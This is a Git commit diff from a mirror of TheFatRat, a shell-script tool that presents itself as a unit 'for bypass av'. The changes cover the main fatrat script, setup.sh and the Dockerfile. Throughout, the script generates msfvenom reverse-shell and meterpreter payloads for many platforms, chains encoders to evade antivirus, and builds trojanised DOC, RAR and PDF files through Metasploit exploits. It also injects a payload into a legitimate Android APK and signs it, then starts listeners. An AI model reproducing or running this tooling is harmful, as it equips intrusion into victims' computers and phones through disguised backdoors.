deviloric
/
TheFatRat
mirror of https://github.com/Screetsec/TheFatRat.git
0
0
Fork 0
Code Releases Activity

Merge pull request #53 from peterpt/master 

version update 1.8.1
This commit is contained in:
Edo -maland- 2017-02-27 12:27:12 +07:00 committed by GitHub
parent ee4aa5304f 7c3c5ceda2
commit 133e9049e2
9 changed files with 323 additions and 148 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
CHANGELOG.md
View File

@ -1,5 +1,9 @@
## CHANGELOG
* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs
* - added more packages instalations needed for non-pentest distribution & some bugs fixed
* v1.8 - add file pumper in TFR
* v1.8 - Backdoor with c program for meterpreter reverse_tcp
* v1.8 - Metasploit staging protocol ( c program )

15
Dockerfile
View File

@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \
backdoor-factory \
monodevelop \
ruby \
apache2
apache2 \
upx-ucl \
xterm \
gnome-terminal \
default-jre \
default-jdk \
unzip \
aapt \
apktool \
dex2jar \
zlib1g-dev \
libmagickwand-dev \
imagemagick \
zipalign
WORKDIR /root/TheFatRat
ADD . ./

5
README.md
View File

@ -3,7 +3,7 @@
#TheFatRat ( Unit for bypass av )
##Update: Version 1.8
##Update: Version 1.8.1
##Codename: Spark
What is TheFatRat ??
@ -87,7 +87,8 @@ And it's up & running.
## :heavy_exclamation_mark: Requirements
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling
Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux )
- Must install metasploit framework

4
config/readme.md Normal file
View File

@ -0,0 +1,4 @@
-----------------------------------------
|Folder for FatRat configuration files .|
| Do Not Remove this file . |
-----------------------------------------

157
fatrat
View File

@ -22,23 +22,22 @@ white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
path=`pwd`
#Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
resize -s 33 84 > /dev/null
clear
file="config.path"
file="config/config.path"
if [ -f "$file" ]
then
msfconsole=`sed -n 5p config.path`
msfvenom=`sed -n 6p config.path`
backdoor=`sed -n 7p config.path`
searchsploit=`sed -n 8p config.path`
msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p $file`
else
echo "Configuration file does not exists , run setup.sh first ."
echo "Configuration file does not exists , run setup.sh first ."
exit 1
fi
@ -113,7 +112,7 @@ cat << !
# Some Variables
#####################
path=`pwd`
Versi=1.8
Versi=1.8.1
codename=Sparta
OS=`uname` #
distro=`awk '{print $1}' /etc/issue`
@ -135,7 +134,9 @@ out='output/ip.txt'
pump='tools/pump.py'
reverse1='temp/reverse1.c'
stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
###################################################
# CTRL C
###################################################
@ -158,7 +159,7 @@ exit
#########################
#CHECK DEPENDICS
#CHECK DEPENDICIES
#########################
echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies] ;
sleep 2
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
sleep 1
echo [x]::[not root]: you need to be [root] to run this script.;
echo [x]::[not root]: you need to be [root] to run this script.;
echo ""
sleep 1
exit
@ -187,8 +188,8 @@ else
echo [!]::[Check Dependencies]: ;
sleep 1
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ;
fi
@ -211,7 +212,7 @@ fi
# check apache if exists
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo [✔]::[Apache2 Server $distro ]: installation found!;
echo [✔]::[Apache2 Server $distro ]: installation found!;
else
echo [x]::[warning]:this script require apache2 to work ;
@ -251,12 +252,12 @@ sleep 2
# check if msfvenom exists
which $msfvenom > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo [✔]::[Msfvenom]: installation found!;
echo [✔]::[Msfvenom]: installation found!;
else
echo [x]::[warning]:this script require msfvenom installed to work ;
echo ""
echo [!]::Run setup.sh to install metasploit-framework ;
echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3
exit 1
fi
@ -559,7 +560,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2'
then
@ -574,7 +575,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3'
then
@ -589,7 +590,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4'
then
@ -604,7 +605,7 @@ echo ""
spinlong
echo ""
echo ""
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5'
then
@ -619,7 +620,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6'
then
@ -634,7 +635,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7'
then
@ -649,7 +650,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8'
then
@ -664,7 +665,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9'
then
@ -679,7 +680,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10'
then
@ -694,7 +695,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11'
then
@ -709,7 +710,7 @@ echo ""
spinlong2
echo ""
echo ""
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12'
@ -733,9 +734,9 @@ echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
echo -e $okegreen""
echo -e $yellow" Backdoor doc Saved To output Folder "
echo ""
@ -766,9 +767,9 @@ echo ""
gboor
spinlong
echo ""
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'"
echo ""
mv ~/.msf4/local/$fira $path/output/$fira
mv ~/.msf4/local/$fira $path/output/$fira
echo -e $okegreen""
echo -e $yellow" Backdoor Saved To output Folder "
echo ""
@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" &
clear
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear
elif test $fatrat1 == '2' #Windows
then
rm temp/*.rc > /dev/null 2>&1
@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================
echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear
elif test $fatrat1 == '3' #Mac
then
@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear
elif test $fatrat1 == '4' #Android
@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" &
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear
elif test $fatrat1 == '5'
@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo ""
echo "Cleaning Temp files"
rm -rf output/*
sleep 2
echo "Done!"
echo -e $okegreen""
sleep 1
echo -ne " SET LHOST : ";tput sgr0
read yourip
echo ""
@ -936,7 +942,22 @@ read yourport
echo ""
echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0
read copyfile
cp $copyfile $path/output/fatrat.apk
cp $copyfile $path/output/fatrat.apk
apkt="$path/output/fatrat.apk"
if [ ! -f $apkt ]; then
echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path "
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
$unzip -l $apkt > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo "[!] Original APK file specified is not valid"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
@ -946,16 +967,36 @@ spinlong
gboor2
spinlong
echo ""
sleep 1
echo "Creating RAT payload with msfvenom"
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk
echo "Done !"
sleep 2
echo "Starting the merging process of RAT with the APK you selected"
echo ""
ruby $apkembed $path/output/fatrat.apk
echo ""
echo ""
ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport
echo ""
cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk
rm -rf $path/output/*
java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk
rm backdoored/apkembed.apk
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) "
echo "Merge completed of Payload with your APK"
sleep 2
cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk
echo "File copied with success to : $path/backdoored"
sleep 2
echo "Removing temporary files from output"
sleep 2
rm -rf $path/output/*
echo "Signing your APK file"
sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk
rm $path/backdoored/apkembed.apk
mv $path/Apk_embed_backdoor.apk $path/backdoored/output/
outapk="$path/backdoored/output/Apk_embed_backdoor.apk"
if [ ! -f $outapk ]; then
echo "[!] APK Rat file was not found in : $path/backdoored/output/"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here :
$path/backdoored/output/Apk_embed_backdoor.apk"
read loveyou
echo
clear
@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
cat powershell_attack.txt
sleep 2
rm unicorn.rc
mv powershell_attack.txt output/$fira.bat
mv powershell_attack.txt output/$fira.bat
echo ""
echo -e $okegreen""
echo -e "Backdoor Saved To output Folder "
@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo " Wait for embed exe to pdf .... "
xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
echo ""
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
rm unicorn.rc powershell_attack.txt
echo -e $okegreen""
echo -e $yellow" Backdoor PDF Saved To output Folder "
@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo ' function();'>>$stag
echo ' return 0;'>>$stag
echo '}' >> $stag
$COMPILER $stag -o output/$fira.exe -lws2_32
$COMPILER $stag -o output/$fira.exe -lws2_32
echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $stag
@ -1916,7 +1957,7 @@ menu () {
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
@ -1936,7 +1977,7 @@ menu () {
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku
clear
@ -1956,7 +1997,7 @@ menu () {
elif test $fatrat == '8'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9'
then
@ -2114,7 +2155,7 @@ echo
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
@ -2134,7 +2175,7 @@ echo
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku
clear
@ -2154,7 +2195,7 @@ echo
elif test $fatrat == '8'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9'
then

3
logs/readme.md Normal file
View File

@ -0,0 +1,3 @@
*******************************************************************************
* All TheFatRat logs will be stored in this folder , do not delete this file! *
*******************************************************************************

10
powerfull.sh
View File

@ -1,11 +1,11 @@
#!/bin/bash
file="config.path"
file="config/config.path"
if [ -f "$file" ]
then
msfconsole=`sed -n 5p config.path`
msfvenom=`sed -n 6p config.path`
backdoor=`sed -n 7p config.path`
searchsploit=`sed -n 8p config.path`
msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p $file`
else
echo "Configuration file does not exists , run setup.sh first ."
exit 1

242
setup.sh
View File

@ -8,11 +8,19 @@ sleep 4s
rm -f /etc/apt/sources.list
mv /etc/apt/sources.list.fatrat /etc/apt/sources.list
echo "Your Original repository list was recovered. ;) ..... beginning setup"
echo ""
echo "Cleaning previous repositories cache & updating your repository ."
sudo apt-get clean && apt-get update -y
sleep 3s
else
echo ""
fi
fi
path=`pwd`
log=$path/logs/setup.log
config=$path/config/config.path
#Removing any previous setup log created
rm -f $log
# setup.sh Author : Edo maland ( Screetsec )
# Install all dependencies nedded
# configuration all file for fixing all problem
@ -20,7 +28,7 @@ fi
#Check root dulu
[[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; }
resize -s 30 73 > /dev/null
resize -s 30 73 > /dev/null 2>&1
clear
@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]"
echo " [ ] Install all dependencies [ ]"
echo " [ ]=================================================[ ]";
echo ""
touch $log
echo "------------------------------------------------------" >> $log
echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log
echo "------------------------------------------------------" >> $log
echo " " >> $log
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Xterm.............................[ found ]"
which xterm >> $log 2>&1
sleep 2
else
echo ""
@ -62,12 +75,14 @@ sleep 2
sudo apt-get install xterm -y
clear
echo "[ ✔ ] Done installing .... "
which xterm >> $log 2>&1
fi
#check if zenity its installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zenity............................[ found ]"
which zenity >> $log 2>&1
sleep 2
else
echo ""
@ -77,18 +92,21 @@ sleep 2
echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y"
echo "[ ✔ ] Done installing .... "
which zenity >> $log 2>&1
fi
# check if gcc exists
which gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gcc compiler......................[ found ]"
which gcc >> $log 2>&1
sleep 2
else
echo "[ X ] gcc compiler -> not found ]"
echo "[ ! ] Installing gcc from your apt sources ]"
xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y"
echo "[ ✔ ] Done installing .... "
which gcc >> $log 2>&1
sleep 2
fi
@ -96,12 +114,14 @@ fi
which i586-mingw32msvc-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Mingw32 Compiler..................[ found ]"
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2
else
echo "[ X ] mingw32 compiler -> not found ]"
echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y"
echo "[ ✔ ] Done installing .... "
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2
fi
@ -109,12 +129,14 @@ fi
which monodevelop > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Monodevelop ......................[ found ]"
which monodevelop >> $log 2>&1
sleep 2
else
echo "[ X ] Monodevelop -> not found ]"
echo "[ ! ] Installing monodevelop from your apt sources ]"
xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y"
echo "[ ✔ ] Done installing ...."
which monodevelop >> $log 2>&1
sleep 2
fi
@ -122,12 +144,14 @@ fi
which ruby > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Ruby .............................[ found ]"
which ruby >> $log 2>&1
sleep 2
else
echo "[ X ] Ruby -> not found ]"
echo "[ ! ] Installing ruby from your apt sources ]"
xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y"
echo "[ ✔ ] Done installing ...."
which ruby >> $log 2>&1
sleep 2
fi
@ -135,12 +159,14 @@ fi
which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apache2 ..........................[ found ]"
which apache2 >> $log 2>&1
sleep 2
else
echo "[ X ] Apache2 -> not found ]"
echo "[ ! ] Installing apache2 from your apt sources ]"
xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y"
echo "[ ✔ ] Done installing ...."
which apache2 >> $log 2>&1
sleep 2
fi
@ -150,12 +176,14 @@ fi
which gnome-terminal > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gnome Terminal....................[ found ]"
which gnome-terminal >> $log 2>&1
sleep 2
else
echo "[ X ] Gnome-terminal-> not found ]"
echo "[ ! ] Installing gnome-terminal from your apt sources ]"
xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y"
echo "[ ✔ ] Done installing ...."
which gnome-terminal >> $log 2>&1
sleep 2
fi
@ -163,12 +191,95 @@ fi
which upx > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] UPX Compressor....................[ found ]"
which upx >> $log 2>&1
sleep 2
else
echo "[ X ] Upx compressor -> not found ]"
echo "[ ! ] Installing upx-compressor from your apt sources ]"
xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y"
echo "[ ✔ ] Done installing ...."
which upx >> $log 2>&1
sleep 2
fi
#Checking if keytool exists
which keytool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Keytool (java)....................[ found ]"
which keytool >> $log 2>&1
sleep 2
else
echo "[ X ] Keytool (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y "
echo "[ ✔ ] Done installing ...."
which keytool >> $log 2>&1
sleep 2
fi
#Checking if Jarsigner exists
which jarsigner > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Jarsigner (java)..................[ found ]"
which jarsigner >> $log 2>&1
sleep 2
else
echo "[ X ] Jarsigner (java) -> not found ]"
echo "[ ! ] Installing Java from your apt sources ]"
xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y "
echo "[ ✔ ] Done installing ...."
which jarsigner >> $log 2>&1
sleep 2
fi
#Checking if Unzip exists
which unzip > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Unzip.............................[ found ]"
which unzip >> $log 2>&1
sleep 2
else
echo "[ X ] Unzip -> not found ]"
echo "[ ! ] Installing Unzip from your apt sources ]"
xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y "
echo "[ ✔ ] Done installing ...."
which unzip >> $log 2>&1
sleep 2
fi
#Checking if Aapt exists
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Aapt..............................[ found ]"
which aapt >> $log 2>&1
sleep 2
else
echo "[ X ] Aapt -> not found ]"
echo "[ ! ] Installing Aapt from your apt sources ]"
xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y "
echo "[ ✔ ] Done installing ...."
which aapt >> $log 2>&1
sleep 2
fi
#Installing dependencies for Zipalign
echo "[ ! ] Installing Zipalign dependencies from your apt sources"
xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y "
echo "[ ✔ ] Done installing ...."
sleep 2
#Checking if Zipalign exists
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zipalign..........................[ found ]"
which zipalign >> $log 2>&1
sleep 2
else
echo "[ X ] Zipalign -> not found ]"
echo "[ ! ] Installing Zipalign from your apt sources "
xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y "
echo "[ ✔ ] Done installing ...."
which zipalign >> $log 2>&1
sleep 2
fi
@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s
echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list
sleep 2
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update"
xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1
#Checking if apktool exists
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Apktool...........................[ found ]"
which apktool >> $log 2>&1
sleep 2
else
echo "[ X ] Apktool -> not found ]"
echo "[ ! ] Installing apktool from Kali repositories ]"
echo "[ X ] Apktool -> not found "
echo "[ ! ] Installing apktool from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y"
echo "[ ✔ ] Done installing ...."
which apktool >> $log 2>&1
sleep 2
fi
#Checking if dex2jar exists
which d2j-jar2dex > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Dex2Jar...........................[ found ]"
which d2j-jar2dex >> $log 2>&1
sleep 2
else
echo "[ X ] Dex2jar -> not found "
echo "[ ! ] Installing dex2jar from Kali repositories "
xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y"
echo "[ ✔ ] Done installing ...."
which d2j-jar2dex >> $log 2>&1
sleep 2
fi
#installing dependencies for ruby script
echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories "
xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y"
echo "[ ✔ ] Done installing ...."
sleep 2
# check if metasploit-framework its installed
which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Metasploit-Framework..............[ found ]"
# msf was detected , removing config file in case setup was already configured before
rm -f config.path
rm -f $config
#Creating new config file based on last detection of msf
touch config.path
echo "********************************************************************************************************" >> config.path
echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path
echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path
echo "********************************************************************************************************" >> config.path
echo "msfconsole" >> config.path
echo "msfvenom" >> config.path
touch $config
echo "********************************************************************************************************" >> $config
